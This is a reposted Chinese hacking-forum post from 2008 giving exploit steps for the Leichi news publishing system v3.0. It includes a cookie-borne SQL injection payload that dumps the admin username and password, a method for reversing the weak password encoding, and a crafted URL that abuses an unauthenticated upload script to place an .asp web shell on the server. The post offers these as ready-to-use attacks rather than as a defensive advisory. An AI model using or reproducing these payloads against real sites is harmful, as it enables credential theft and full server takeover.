雷驰新闻发布管理系统v3.0漏洞很简单

<script src="http://www.hookbase.com/design/GetHits.asp?ArticleID=15586" language="javascript" type="text/javascript"></script> 骇客基地 阅读:4 时间:2008-1-13 14:10:27 来源:www.hookbase.com
------------------------------------------------------------------
<script src="http://www.hookbase.com/ad/wz_ad1.js" language="javascript" style="display: none;" type="text/javascript"></script>
 
雷驰新闻发布管理系统v3.0漏洞很简单。
  我就看了两个最直接的漏洞。
转自:bct

第一个就是得到管理员的密码和用户名。。
在http://127.0.0.1/otype.asp?owen1=文体新闻
加上下面的一段COOKIES。。
owen2 =娱乐新闻&#39; and 1=2 union select 1,admin,3,4,5,6,7,8,password,10,11 from admin where 1&lt;2 and &#39;&#39;=&#39;
(注意要转换一下。。)直接得到管理员的用户名与密码
其密码简单加密了,第一位加1,第二位加2。。第5位加5
如果密码本来是aaaaa的话,那么加密出来就是bcdef
如果加密后的密码是fffff的话,那么原来的密码就是edcba

第二个漏洞,直接得到WEBSHELL
后门有一个上传图片,里面的有一段代码是这样的
actionType = trim(Request.QueryString("actionType"))
picName = trim(Request.QueryString("picName"))
…………
if actionType= "mod" then
remFileName = Right(picName,len(picName)-InstrRev(picName,"/"))
else
…………
end if
file.SaveAs Server.mappath(formPath&remFileName)

提交地址改成
/admin/uploadPic.inc.asp?upload_code=ok&editImageNum=1&actionType=mod&picName=123.asp&editRemNum=123123123
就可以直接上传一个马了。。。

第二个漏洞问题很严重,因为uploadPic.inc.asp这个文件竟然没有验证管理员是否登陆。。。。

意思就是说,第一步都可以省略了来搞,汗~~~~

我主要就是想说明的问题就是
这个程序的漏洞太大了,而且利用太简单了而已。。。。
 
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值